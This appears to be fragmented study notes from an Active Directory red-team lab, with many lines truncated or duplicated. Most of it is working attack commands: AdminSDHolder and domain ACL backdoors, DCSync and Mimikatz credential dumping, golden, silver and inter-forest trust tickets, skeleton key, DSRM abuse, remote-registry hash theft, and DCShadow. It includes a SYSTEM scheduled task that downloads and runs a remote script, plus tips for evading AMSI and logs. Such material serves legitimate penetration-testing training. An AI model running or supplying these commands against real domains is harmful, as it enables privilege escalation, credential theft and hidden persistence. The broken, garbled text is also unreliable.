- During Red Teams, after getting the Domain Admin privs, if we create a user and make it a member of the DA group, then it
such that our user has full permissions on the DA group without even being part of the DA group.

Tool Command
Invoke- Invoke-SDPropagator -timeoutMinutes 1 -showProgress -
SDPropagator Verbose

PowerView Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,

CN=System' -PrincipalSamAccountName student1 -Rights All -
Verbose
AD Module Set-ADACL -DistinguishedName
'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycor
p,DC=local' -Principal student1 -Verbose

Other than the FullControl, we can also assign other interesting permissions(ResetPassword, WriteMember) for a user to th

Tool Command
PowerView Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,
CN=System' -PrincipalSamAccountName student1 -Rights
ResetPassword -Verbose
PowerView Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,
CN=System' -PrincipalSamAccountName student1 -Rights
WriteMembers -Verbose
After modifying the required permissions on the ACLs, we propagate it (SDPROP) using Invoke-SDPropagator

Then, we check if the Domain Admin permissions to see if the propagation was successful, as below :

PowerView Get-ObjectAcl -SamAccountName "Domain Admins" -

ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}
AD Module (Get-Acl -Path 'AD:\CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Ac
cess | ?{$_.IdentityReference -match 'student1'}

After providing FullControl permissions to the AdminSDHolder (and DA), we can abuse it to add a member to the Domain Ad
But, we shall still see how to do it, inspite of it not being the recommended choice.
PowerView_Dev Add-DomainGroupMember -Identity 'Domain Admins' -
Members testda -Verbose
AD Module Add-ADGroupMember -Identity 'Domain Admins' -Members
testda

PowerView_Dev Set-DomainUserPassword -Identity testda -AccountPassword

(ConvertTo-SecureString "Password@123" -AsPlainText -
Force) -Verbose
AD Module Set-ADAccountPassword -Identity testda -NewPassword
(ConvertTo-SecureString "Password@123" -AsPlainText -
Force) -Verbose

PERSISTENCE using ACLs - Rights Abuse

- There are even more interesting ACLs that can be abused (like ACLs of the domain object itself)
- For example, with DA privileges, the ACL for the domain root can be modified to:
a.) provide useful rights like FullControl or
b.) the ability to run "DCSync".
- To perform DCSync, only 3 rights are needed - 'Replicating Directory changes' , 'Replicating Directory Changes All' & 'Replica
- If we give these 3 rights to a normal domain user, the user can perform dcsync and dump the krbtgt hash

Tool Command
FullControl rights
PowerView_Dev Add-ObjectAcl -TargetDistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName student1 -Rights All -Verbose
AD Module Set-ADACL -DistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -
Verbose

DCSync rights (a.k.a Replication rights)

PowerView_Dev Add-ObjectAcl -TargetDistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName student1 -Rights DCSync -Verbose

AD Module Set-ADACL -DistinguishedName

'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -
GUIDRight DCSync -Verbose
Mimikatz Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\
(Invoke- krbtgt" '
Mimikatz)

PERSISTENCE using ACLs - Security Descriptors

- It is possible to modify Security Descriptors (security information like Owner, Primary Group, DACL and SACL) of multiple rem
- Administrative privileges are required for this. (Local Admin privs)
- It, of course, works as a very useful and impactful backdoor mechanism.
- So, in short what we are trying to do is:
There are multiple remote access protocols like WMI, PS Remoting, etc., which only admins are given access to logon to m
the machines.
 - It is possible to modify Security Descriptors (security information like Owner, Primary Group, DACL and SACL) of multiple rem
- Administrative privileges are required for this. (Local Admin privs)
- It, of course, works as a very useful and impactful backdoor mechanism.
- So, in short what we are trying to do is:
There are multiple remote access protocols like WMI, PS Remoting, etc., which only admins are given access to logon to m
the machines.

- Security Descriptor Definition Language(SDDL) defines the format which is used to describe a security descriptor.
- SDDL uses ACE strings for DACL and SACL:
ace_type, ace_flags, rights, object_guid, inherit_object_guid, account_sid
- ACE for built-in administrators for WMI namespaces:
A, CI, CCDCLCSWRPWPRCWD,,,SID
Reference:
https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings?redirectedfrom=MSDN

So, in the example ACE string as given above, if we replace the SID part with the SID of the user/account that we want to give
Let's see how!
There are 2 ways to do it :
1. Using GUI
2. Using the Scripts

WMI

- In our example here, we are going to give 'studentadmin' the access to WMI onto the Domain Controller without giving adm
- WMI authentication consists of 2 parts:
1. We must have the privileges to connect to the DCOM endpoint.
2. We must have the privileges to connect to the namespace.

a.) Get privileges to connect to the DCOM endpoint.

Press Windows Key > Open Component Services > Under Component Services--Computers--My Computer > Properties > COM
4) > apply > OK
b.) Get privileges to connect to the WMI namespaces.
Server Manager > Tools > Computer Management > Services and Applications > WMI Control > Properties > Security Tab > Sec
and Applies to:This name and subnamespaces > OK > Apply > OK

Verify using the below command if our user (studentadmin, here) is able to query the DC using WMI.
Tool Command
PowerShell Get-Wmiobject -Class win32_operatingsystem -
ComputerName dcorp-dc.dollarcorp.moneycorp.local
Method 2: Using Scripts (Set-RemoteWMI)
ACLs can be modified to allow non-admin users access to securable objects

Tool Command
Set-RemoteWMI Set-RemoteWMI -UserName student1 -Verbose

Set-RemoteWMI Set-RemoteWMI -UserName student1 -ComputerName

dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\
cimv2' -Verbose
Set-RemoteWMI Set-RemoteWMI -UserName student1 -ComputerName
dcorp-dc.dollarcorp.moneycorp.local -Credential
Administrator -namespace 'root\cimv2' -Verbose

Set-RemoteWMI Set-RemoteWMI -UserName student1 -ComputerName

dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\
cimv2' -Remove -Verbose

Verify using the below command if our user (studentadmin, here) is able to query the DC using WMI.

Tool Command
PowerShell Get-Wmiobject -Class win32_operatingsystem -
ComputerName dcorp-dc.dollarcorp.moneycorp.local

PowerShell Remotin
Set- Set-RemotePSRemoting -UserName student1 -Verbose
RemotePSRemoti
ng
Set- Set-RemotePSRemoting -UserName student1 -
RemotePSRemoti ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ng Verbose
Set- Set-RemoteWMI -UserName student1 -ComputerName
RemotePSRemoti dcorp-dc.dollarcorp.moneycorp.local -Remove
ng
Verify using the below command if our user (studentadmin, here) is able to query the DC using WMI.

Tool Command
PowerShell Invoke-Command -ScriptBlock{whoami} -ComputerName
dcorp-dc.dollarcorp.moneycorp.local

Editing the Remote registry (https://github

DAMP Add-RemoteRegBackdoor -ComputerName dcorp-
dc.dollarcorp.moneycorp.local -Trustee student1 -Verbose

DAMP Get-RemoteMachineAccountHash -ComputerName dcorp-

dc.dollarcorp.moneycorp.local -Verbose

DAMP Get-RemoteLocalAccountHash -ComputerName dcorp-

dc.dollarcorp.moneycorp.local -Verbose

DAMP Get-RemoteCachedCredential -ComputerName dcorp-

dc.dollarcorp.moneycorp.local -Verbose
n on the PAC (computer account long-term key)

ccount which makes it a valid TGT ticket

e can use even deleted/revoked accounts
ny privileges from even a non-domain machine

local admin privs and even from a non domain joined machine
Description Privileges
Payload to bypass AMSI Normal User

Execute mimikatz on DC (as Domain Admin) to get Domain Admin

KRBTGT hash privs

To create golden ticket (post receiving the hash of Domain Admin

krbtgt) privs

To see the list of injected tickets in the current Normal User

session
 Once the golden ticket is created and injected in the Golden ticket
current powershell process, we can try to dump data injected in PS
from DC this way as well process
To use the DC sync feature for getting krbtgt hash Domain Admin
privs

he DC validates the NTLM hash of the krbtgt account when presented the ticket (TGT)
application server validates the NTLM hash of the service account when presented the TGS ticket
so that we can access the service as any user (incl. as high priv users)
nd signed by the NTLM hash of the service account (Golden ticket is signed by the hash of the krbtgt account) of the service running with t

unts)
c...) use the machine accounts as the service accounts, hence we would be targeting machine accounts (in particular - the domain control
.

Description Privileges
Execute mimikatz on DC (as Domain Admin) to get Domain Admin
domain secrets (krbtgt hash, machine account privs
password/hash, etc...)

In our case, the machine account would be DCORP-

DC$
 Using hash of the DC machine account, this command Domain Admin
provides access to shares on the DC. privs

e as well, such as HOST, RPCSS, WSMAN and many more.

Ns

r tickets.
dule a task on the target:
p.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST

on the DC) :
/RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('

ority\SYSTEM privs and the name of the task is "STCheck"

"

a domain controller (lsass process) so that it allows access as any user with a single password.
named the skeleton key malware.
 a domain controller (lsass process) so that it allows access as any user with a single password.
named the skeleton key malware.

Description Privileges
Injects a skeleton key (password would be mimikatz) Domain Admin
on a DC privs required

password as "mimikatz"
strator

keleton key, but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC.

rnel mode driver)

hose password is the DSRM password. (Note that this is NOT the RID = 500 Administrator)
promoted to Domain Controller and it is rarely changed.
NTLM hash of this user to access the DC.
ode

Description Privileges
Dump DSRM password need DA privs
(DSRM local admin)

n pass the hash to authenticate.

ed before we can use it's hash.

login to the DC
 Create the registry key "DsrmAdminLogonBehavior" if
it doesn't exist

Modify the registry key "DsrmAdminLogonBehavior"

if it exists

Check the registry key value

an always run the following command , since we have the hash of the DSRM account and have changed the DSRM admin login behavior
:Administrator /ntlm:<hash_of_DSRM> /run:powershell.exe" '

n application to obtain an authenticated connection. Some SSP packages by Microsoft are :

swords in clear text on the target server.

rol\Lsa\Security Packages :

ontrol\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'

SConfig\ -Name 'Security Packages' -Value $packages

Name 'Security Packages' -value $packages
ysvol folder (which is accessible by every machine in the domain)

older
of the domain and used to control the permissions (using an ACL) for certain built-in privileged groups (called Protected Groups)
nd compares the ACL of the protected groups and members with the ACL of AdminSDHolder and any differences are over-written on the o

erators, Domain Admins, Replicator, Enterprise Admins, Domain Controllers, Read-Only Domain Controllers, Schema Admins, Administrat

dmins or Built-in Admins, but can modify the nested group within these groups.
count to a privileged group and Restore.
sabled Browser service)

ed above. All the above protected groups can log on locally to DC.
te a user and make it a member of the DA group, then it is usually detected. Instead, what we can do is without becoming a member of th
being part of the DA group.

Description Privileges
To run SDProp process manually using Invoke-
SDPropagator

Add FullControl Permissions for a user(student1, Domain Admin

here) to the AdminSDHolder using PowerView privs required
 Add FullControl Permissions for a user(student1, Domain Admin
here) to the AdminSDHolder using ADModule & Set- privs required
ADACL

missions(ResetPassword, WriteMember) for a user to the AdminSDHolder

Description Privileges
Add ResetPassword Permissions for a user(student1, Domain Admin
here) to the AdminSDHolder using PowerView privs required

Add WriteMembers Permissions for a user(student1, Domain Admin

here) to the AdminSDHolder using PowerView privs required

it (SDPROP) using Invoke-SDPropagator

gation was successful, as below :

Check the Domain Admin ACLs (to verify propagation) Normal Domain
user
Check the Domain Admin ACLs (to verify propagation) Normal Domain
user

DA), we can abuse it to add a member to the Domain Admins (or any of the protected groups) - It is not recommended
ended choice.
Abusing FullControl permissions to add "testda" Domain Admin
account to Domain Admins Group privs required
Abusing FullControl permissions to add "testda" Domain Admin
account to Domain Admins Group privs required

Abusing ResetPassword permissions to reset the Domain Admin

password of testda account (or any account that is privs required
already a DA, as well)
 Abusing ResetPassword permissions to reset the Domain Admin
password of testda account (or any account that is privs required
already a DA, as well)

e
of the domain object itself)
e modified to:

y changes' , 'Replicating Directory Changes All' & 'Replicating Directory Changes in Filtered set'
orm dcsync and dump the krbtgt hash

Description Privileges

Add FullControl rights Domain Admin

privs required

Add FullControl rights Domain Admin

privs required

s)
Add rights for DCSync Domain Admin
privs required

Add rights for DCSync Domain Admin

privs required

Execute DCSync Should have

added DCSync
rights with DA
privs for the user

(No need of DA
privs while
executing this if
rights were
added)

scriptors
e Owner, Primary Group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users.

ism.

g, etc., which only admins are given access to logon to machines via, but we are going to modify the security descriptors and allow even n
e Owner, Primary Group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users.

ism.

g, etc., which only admins are given access to logon to machines via, but we are going to modify the security descriptors and allow even n

hich is used to describe a security descriptor.

ount_sid

ings?redirectedfrom=MSDN

t with the SID of the user/account that we want to give access to the protocol namespace, then we can do so.

WMI

s to WMI onto the Domain Controller without giving admin privileges to the 'studentadmin' user.

endpoint.
Services--Computers--My Computer > Properties > COM Security > Edit Limits (first and second one) > add > studentadmin > Give all perm

amespaces.
ications > WMI Control > Properties > Security Tab > Security > add > studentadmin > Give all permissions > advanced > studentadmin > e

ble to query the DC using WMI.

Description Privileges
List the classes and info. from the DC using wmi with Normal user
the privileges of studentadmin (studentadmin,
here)
WMI)
bjects

Description Privileges
Modifying ACLs to allow non-admin users access to Domain Admin
securable objects (using WMI) on local machine for Privs required
student1
Modifying ACLs to allow non-admin users access to Domain Admin
securable objects (using WMI) on remote machine for Privs required
student1 without explicit credentials
Modifying ACLs to allow non-admin users access to Domain Admin
securable objects (using WMI) on remote machine for Privs required
student1 with explicit credentials. Only root\cimv2
and nested namespaces.

Modifying ACLs to remove non-admin users access to Domain Admin

securable objects (using WMI) Privs required

ble to query the DC using WMI.

Description Privileges
List the classes and info. from the DC using wmi with Normal user
the privileges of studentadmin (studentadmin,
here)

PowerShell Remoting
Modifying ACLs to allow non-admin users access to Domain Admin
securable objects (using PS Remoting) on local Privs required
machine for student1
Modifying ACLs to allow non-admin users access to Domain Admin
securable objects (using PS Remoting) on remote Privs required
machine for student1 without explicit credentials
Modifying ACLs to remove non-admin users access to Domain Admin
securable objects (using WMI) Privs required
ble to query the DC using WMI.

Description Privileges
PS Remote onto the DC using PS Remoting with the Normal user
privileges of studentadmin (studentadmin,
here)

iting the Remote registry (https://github.com/HarmJ0y/DAMP)

Edits/modifies the required registry keys in order to Domain Admin
be able to execute the below commands Privs required

Fetches the Machine Account hash of the DC Normal user

(studentadmin,
here)
Fetches the hash of all the local accounts on the DC Normal user
(studentadmin,
here)
Fetches the cached credentials on the DC Normal user
(studentadmin,
here)
Information Obtained / Comments
AMSI is Anti-Malware Scan Interface which was introduced in
PowerShell. It provides the registered AV on the machine to
look/analyze the scripts that we load in the memory.

To use Invoke-Mimikatz, always obfuscate it or bypass AMSI

You can omit the -ComputerName if we are interactively logged in to

a DC using DA privs :
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
kerberos::golden - Name of the module
/User:Administrator - Username for which the TGT is generated
/domain:dollarcorp.moneycorp.local - Domain FQDN
/sid:<sid_id> - SID of the domain
/krbtgt - NTLM (RC4) hash of the krbtgt account. Use /aes128 and
/aes256 for using AES keys
/id:500 /groups:512 - Optional user RID(default 500) and group
default - 513, 512, 520, 518, 519
/ptt - Injects the ticket in the current powershell process (no need to
save the ticket to the disk)
(or)
/ticket - Saves the ticket to a file for later use
/startoffset:0 - Optional when the ticket is available (default 0 - in
minutes). Use negative for a ticket available from the past and a
larger number for the future.
/endin:600 - Optional ticket lifetime (default=10years) in minutes.
The default AD setting is 10 hours (600 minutes)
/renewmax:10080 - Optional ticket lifetime with renewal (default is
10 years) in minutes. The default AD setting is 7 days - 10080
 Instead of dumping hashes as shown in row 63, what we can also do
is try to do it using the DCSync attack. DCSync is very silent on the
domain logs. With our DA privs, we simply request a piece of info
from the DC and the DC complies with us.

Using the DCSync option needs no code execution (no need to run
Invoke-Mimikatz) on the target DC.

e ticket (TGT)
resented the TGS ticket

d by the hash of the krbtgt account) of the service running with that account

be targeting machine accounts (in particular - the domain controller machine account)

Information Obtained / Comments

You can omit the -ComputerName if we are interactively logged in to
a DC using DA privs :
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
 kerberos::golden - Name of the module (there is no Silver module!)
/User:Administrator - Username for which the TGT is generated
/domain:dollarcorp.moneycorp.local - Domain FQDN
/sid:<sid_id> - SID of the domain
/target:dcorp-dc.dollarcorp.moneycorp.local - target server FQDN
/service:CIFS - The SPN name of service for which TGS is to be created
/rc4 - NTLM (RC4) hash of the service account. Use /aes128 and
/aes256 for using AES keys
/id:500 /groups:512 - Optional user RID(default 500) and group
default - 513, 512, 520, 518, 519
/ptt - Injects the ticket in the current powershell process (no need to
save the ticket to the disk)
(or)
/ticket - Saves the ticket to a file for later use
/startoffset:0 - Optional when the ticket is available (default 0 - in
minutes). Use negative for a ticket available from the past and a
larger number for the future.
/endin:600 - Optional ticket lifetime (default=10years) in minutes.
The default AD setting is 10 hours (600 minutes)
/renewmax:10080 - Optional ticket lifetime with renewal (default is
10 years) in minutes. The default AD setting is 7 days - 10080

arget:dcorp-dc.dollarcorp.moneycorp.local /service:HOST

(New-Object Net.WebClient).DownloadString('

ith a single password.

ith a single password.

Information Obtained / Comments

When used in an actual red team, please ensure that you modify the
script and use a stronger skeleton key than "mimikatz"

target DC.

0 Administrator)

Information Obtained / Comments

( Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ' -
ComputerName dcorp-dc.dollarcorp.moneycorp.local ) gives us
hashes from the lsass process, whereas dumping DSRM password
gives hashes from the SAM hive
SRM account and have changed the DSRM admin login behavior :-

by Microsoft are :

ty 'Security Packages'
ain built-in privileged groups (called Protected Groups)
L of AdminSDHolder and any differences are over-written on the object ACL (ACL of protected groups).

ers, Read-Only Domain Controllers, Schema Admins, Administrators

oups.

ed. Instead, what we can do is without becoming a member of the Domain Admins group, we can modify the ACLs

Information Obtained / Comments

For pre-server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1
-showProgress -Verbose
 a.) Import-Module .\Microsoft.ActiveDirectory.Management.dll
b.) Import-Module .\ActiveDirectory\ActiveDirectory.psd1
c.) . .\Set-ADACL.ps1
d.) Command given

Information Obtained / Comments

the protected groups) - It is not recommended

anges in Filtered set'

Information Obtained / Comments

very silent

very silent

DCSync is generally used for krbtgt account for it's hash

But that does not mean that we cannot use it for other accounts as
well
Eg:
Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\
Administrator" '

hods (securable objects) to allow access to non-admin users.

we are going to modify the security descriptors and allow even non-admin users to use the protocols and logon to
hods (securable objects) to allow access to non-admin users.

we are going to modify the security descriptors and allow even non-admin users to use the protocols and logon to

tocol namespace, then we can do so.

he 'studentadmin' user.

mits (first and second one) > add > studentadmin > Give all permissions (allow all

dentadmin > Give all permissions > advanced > studentadmin > edit > type:allow

Information Obtained / Comments

Use this command if a normal user is able to WMI onto the DC.
Information Obtained / Comments

Information Obtained / Comments

Use this command if a normal user is able to WMI onto the DC.
 Information Obtained / Comments
Use this command if a normal user is able to PS Remote onto the DC.

J0y/DAMP)
Load the module before executing the script :
. .\Add-RemoteRegBackdoor.ps1

After executing the script, we need to edit another script

(RemoteHashRetrieval.ps1) :
Replace $IV with $InitV

And then load the script :

. .\RemoteHashRetrieval.ps1

With this (Machine account hash), we can create a silver ticket for
any service on the Domain Controller

This hash is the same as the DSRM Administrator on the DC

Tool Command

Priv Esc (Child to Parent):

- Child to Forest Root
- Domains in same forest have an implicit two-way trust with other domains. There is a trust-key between the parent and ch
- There are 2 ways of escalating privileges between two domains of same forest:
* Krbtgt hash
* Trust tickets

Method 1 - Trust
 - Child to Forest root using trust tickets.
- So, what is required to forge trust tickets, is obviously the trust key.
- Look for [In] trust key from child to parent
Step 1 : Get the trust key
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "lsadump::trust /patch" ' -
Mimikatz) ComputerName dcorp-dc
(or)
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\
Mimikatz) mcorp$"'

Once we have the trust key, we can forge an inter-realm TGT.

Step 2 : Forge the inter-realm TGT

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "Kerberos::golden
Mimikatz) /user:Administrator /domain:dollarcorp.moneycorp.local
/sid:<domain_sid> /sids:<SID of the Enterpise Admins group of
parent domain> /rc4:<trust_key> /service:krbtgt
/target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\
trust_tkt.kirbi" '

After forging the inter-realm tgt, we need to present it to the parent DC and ask for TGS

Step 3 : Get a TGS for a service (like CIFS) in the target domain by using the forged trust ticket
kekeo_old .\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi
(asktgs.exe) CIFS/mcorp-dc.moneycorp.local

Use the TGS to access the targeted service

Step 4 : convert the TGS to an injectable format and inject it (using kirbikator - kekeo-old)
kekeo_old .\kirbikator.exe lsa <TGS ticket>
(kirbikator.exe)
Now, we should be able to access the file system (CIFS) in the parent domain controller

Method 2 - KRBTG
We will abuse the SID history, once again.
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::golden
Mimikatz) /user:Administrator /domain:dollarcorp.moneycorp.local
/sid:<Domain_SID> /sids:<Enterprise Admins SID>
/krbtgt:<krbtgt hash> /ticket:C:\AD\Tools\krbtgt_tkt.kirbi" '

Note : incase, you want to abuse the HOST service instead of CIFS, you can check whether the target HOST service in the paren
gwmi -Class win32_operatingsystem -ComputerName mcorp-dc
(this is just like how we used to test "ls \\mcorp-dc.moneycorp.local\c$" for CIFS, only this one(gwmi) is for HOST service and n
Injecting the forged TGT
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "kerberos::ptt C:\AD\Tools\
Mimikatz) krbtgt_tkt.kirbi" '

Note :
Instead of using the SID history of Enterprise Admins group, we can stay more silent and avoid suspicious logs by abusing the S

Avoid suspicious logs :

Invoke-Mimikatz -Command ' "kerberos::golden /user:dcorp-dc$ /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /gro
/krbtgt:<krbtgt_hash> /ptt" '
 Description Privileges

. There is a trust-key between the parent and child domains.

rest:

Method 1 - Trust Tickets

 Get the trust key Domain Admin Privs

Forging an inter-realm TGT Normal Domain User

ask for TGS

rged trust ticket

Requesting a TGS by providing our inter-realm TGT Normal Domain User

- kekeo-old)
 Injecting the TGS to access the target service Normal Domain User
controller

Method 2 - KRBTGT HASH

 Normal Domain User
Forging an inter-realm TGT

eck whether the target HOST service in the parent domain is accessible by:

IFS, only this one(gwmi) is for HOST service and not CIFS)

Injecting the tgt Normal Domain User

e silent and avoid suspicious logs by abusing the SID history of Domain Controllers group and Enterprise Domain Controllers group.

larcorp.moneycorp.local /sid:<domain_sid> /groups:516 /sids:<domain controllers group SID> , <enterprise domain controllers group SID>
Information Obtained / Comments
Here, the NETBIOS name of the parent domain is
mcorp. So, we have given the user value as dcorp\
mcorp$

Kerberos::golden - The mimikatz module

/domain:dollarcorp.moneycorp.local - FQDN of
current domain
/sid - SID of the current domain
/sids - SID of the enterprise admins group of the
parent domain
/rc4 - RC4 of the trust key
/user - User to impersonate
/service - Target service in the parent domain
/target - FQDN of the parent domain
/ticket - Path where ticket is to be saved

Tickets for other services (like HOST & RPCSS for WMI,
HOST and HTTP for PowerShell Remoting and WinRM)
can be created as well.

P.S - please ensure that there is no other inter-realm

tgt in the same folder or which is injected into the
memory while you are requesting for a tgs.
 Here,the "/sids" option is forcefully setting the SID
History for the Enterprise Admin group for
dollarcorp.moneycorp.local, that is the forest
enterpise admin group.

Enterprise Domain Controllers group.

> , <enterprise domain controllers group SID>

 - One difference between escalating to cross-forest attacks and escalating to enterprise admins is that, in case of cross-forest
- This is because of SID filtering at forest level.

Tool Command
Mimikatz (Invoke- Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
Mimikatz)

Mimikatz (Invoke- Invoke-Mimikatz -Command ' "Kerberos::golden

Mimikatz) /user:Administrator /domain:dollarcorp.moneycorp.local
/sid:<sid_id> /rc4:<trust_key> /service:krbtgt
/target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\
trust_forest_tkt.kirbi" '

kekeo_old .\asktgs.exe <inter-forest TGT> CIFS\eurocorp-dc.eurocorp.local

kekeo_old .\kirbikator.exe lsa <TGS>

now, we cannot do something like ls \\eurocorp-dc.eurocorp.local\c$ unless we explicitly have access to the c$ on the targe
We can only access the resources that are explicitly shared with our forest DA.
enterprise admins is that, in case of cross-forest attacks, we cannot abuse the SID history.

1. Client requests TGT

2. Our forest DC provides TGT
3. Client requests TGS for a service hosted in another forest
4. Our forest DC provides an inter-realm TGT to the client
5. The inter-realm TGT is provided by the client to the target forest's DC
6. The target forest's DC decrypts the inter-realm TGT because it has the Trust Key and sends the TGS to the client.
7. Client presents TGS to the application server for access.

- Trust abuse across Forests

- We require the Trust Key for the inter-forest trust.
This can be obtained by:
- Invoke-Mimikatz -Command ' "lsadump::trust /patch" '
(or)
- Invoke-Mimikatz -Command ' "lsadump::lsa /patch" '
Note:
The privilege that a domain admin will have in our forest does not mean that the member will get DA privs in other forest (tru
the member will get the privs that are explicitly assigned to it.

Description Privileges
dump domain secrets Domain Admin
(get the trust key)

forging an inter-forest TGT Domain Admin

requesting a TGS from the target forest Domain Admin

injecting the TGS into the session Domain Admin

we explicitly have access to the c$ on the target forest's DC.
A.
e SID history.

est's DC
has the Trust Key and sends the TGS to the client.

t mean that the member will get DA privs in other forest (trusted) as well,

Information Obtained / Comments

Check for the NetBios name of the target forest and
the NTLM hash of the netbios name will be the trust
key
here, target forest is eurocorp.local

check with klist

 - DCShadow temporarily registers a new domain controller in the target domain and uses it to push attributes like SID history
objects without leaving the change logs for the modified object.
- The new DC is registered by modifying the Configuration container, SPNs of an existing computer object and couple of RPC s
- Because the attributes are changed from a "domain controller", there are no directory change logs on the actual DC for the
- By default, DA privs are required for DCShadow
- Usuallly, to abuse this, the attacker's machine should be part of the root domain.

- We can use Mimikatz for DC Shadow.

- Two instances of Mimikatz are required:
* One to start RPC servers (service) with SYSTEM privs and specify attributes to be modified :
!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value:"Hello from DCShadow"
* Second with enough privs (DA or otherwise) to push the values :
lsadump::dcshadow /push

Tool Command
Mimikatz !+
(Mimikatz.exe) !processtoken
lsadump::dcshadow /object:root1user
/attribute:Description /value:"Hello from DCShadow"

Mimikatz lsadump::dcshadow /push

(Mimikatz.exe)

Instance1
Mimikatz lsadump::dcshadow /push
(Mimikatz.exe)

Instance2
 - DCShadow can be used with minimal permissions by modifying ACLs of :
1. The domain object:
* DS-Install-Replica (Add/Remove Replica in Domain)
* DS-Replication-Manage-Topology (Manage Replication topology)
* DS-Replication-Synchronize (Replication Synchronization)
2. The sites object (and it's children) in the configuration container
* CreateChild and DeleteChild
3. The object of the computer which is registered as a DC
* WriteProperty (Not Write)
4. The target object
* WriteProperty (Not Write)

We can use Set-DCShadowPermissions from Nishang for setting the permissions.

For eg, to use DCShadow as user student1 to modify root1user object from machine mcorp-student1: (this should be execute
Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose

Now, the second mimikatz instance (which runs as DA) is not required.
After executing the above with DA privs, do the same thing on instance 1.
Now, start the instance 2 with SYSTEM privs of student1 and run DCShadow (no need of DA privs)

- Once we have permissions sorted out, so much of other interesting stuff can be done.
- 1.) set SIDHistory of a user account to Enterprise Admins or Domain Admins group :
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-5-21-560323961-2032768757-2425134131-519

Once these changes are pushed (i.e, lsadump::dcshadow /push) , the student1 user runs with the privs of Enterprise Admins

- To use above without DA:

Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose

- 2.) Another interesting thing to do is, we can set the primaryGroupID of a user account to Enterprise Admins or Domain Adm
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

Note that, after the above command is used, the user shows up as a member of the Enterprise Admins group in some enumer

- 3.) It is possible to modify the ACLs of AdminSDHolder using DCShadow, as well.

* Modify ntSecurityDescriptor for AdminSDHolder to add FullControl for a user
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder, CN=System, DC=moneycorp, DC=
* We just need to append a FullControl ACE from above for SY/BA/DA with our user's SID at the end
lsadump::dcshadow /object:CN=AdminSDHolder, CN=System, DC=moneycorp, DC=local /attribute:ntSecurityDescripto
 lsadump::dcshadow /object:CN=AdminSDHolder, CN=System, DC=moneycorp, DC=local /attribute:ntSecurityDescripto

Current ACL

Add ACL with The SID for our user can be obtained from Get-
the SID of our NetUser
user

Modifying the
ACL
Push the
changes waiting
on the RPC
server
(DCShadow)

Mimikatz lsadump::dcshadow /push

(Mimikatz.exe)

Shadowception:
It is possible to run DCShadow from DCShadow - ( a.k.a, Shadowception ):

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp, DC=local")).psbase.ObjectSecurity.sddl

We need to append our User's SID (UserSID) at the end of the following ACEs :
1. On the domain object:
(0A;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(0A;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(0A;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

2. On the attacker computer object:

(A;;WP;;;UserSID)

3. On the target user object: (so that it can modify it's own attributes)
(A;;WP;;;UserSID)

4. On the Sites object in Configuration container:

(A;CI;CCDC;;;UserSID)

• If we maintain access to the computer for which we modified the permissions with the user whose SID we added, we can mo
• Let's see how we can modify properties of root13user from mcorp-student13 machine as studentl3 using DCShadow.

Getting ACLs for

the domain
object
Modifying the On the domain object
ACLs
(please note the
use of the
"stack"
paarameter in
the command

Modifying the
ACLs
(please note the
use of the
"stack"
paarameter in
the command
Modifying the On the attacker computer object
ACLs
(please note the
use of the
"stack"
paarameter in
the command

Modifying the On the target user object

ACLs
(please note the
use of the
"stack"
paarameter in
the command
Modifying the On the Sites object
ACLs
(please note the
use of the
"stack"
paarameter in
the command

Start the RPC

server
lsadump::dcshad
ow

RPC server is
waiting for push
from the DC, so
let's push the
modifications

Mimikatz lsadump::dcshadow /push

(Mimikatz.exe)
n the target domain and uses it to push attributes like SID history, SPNs, etc on specified
ct.
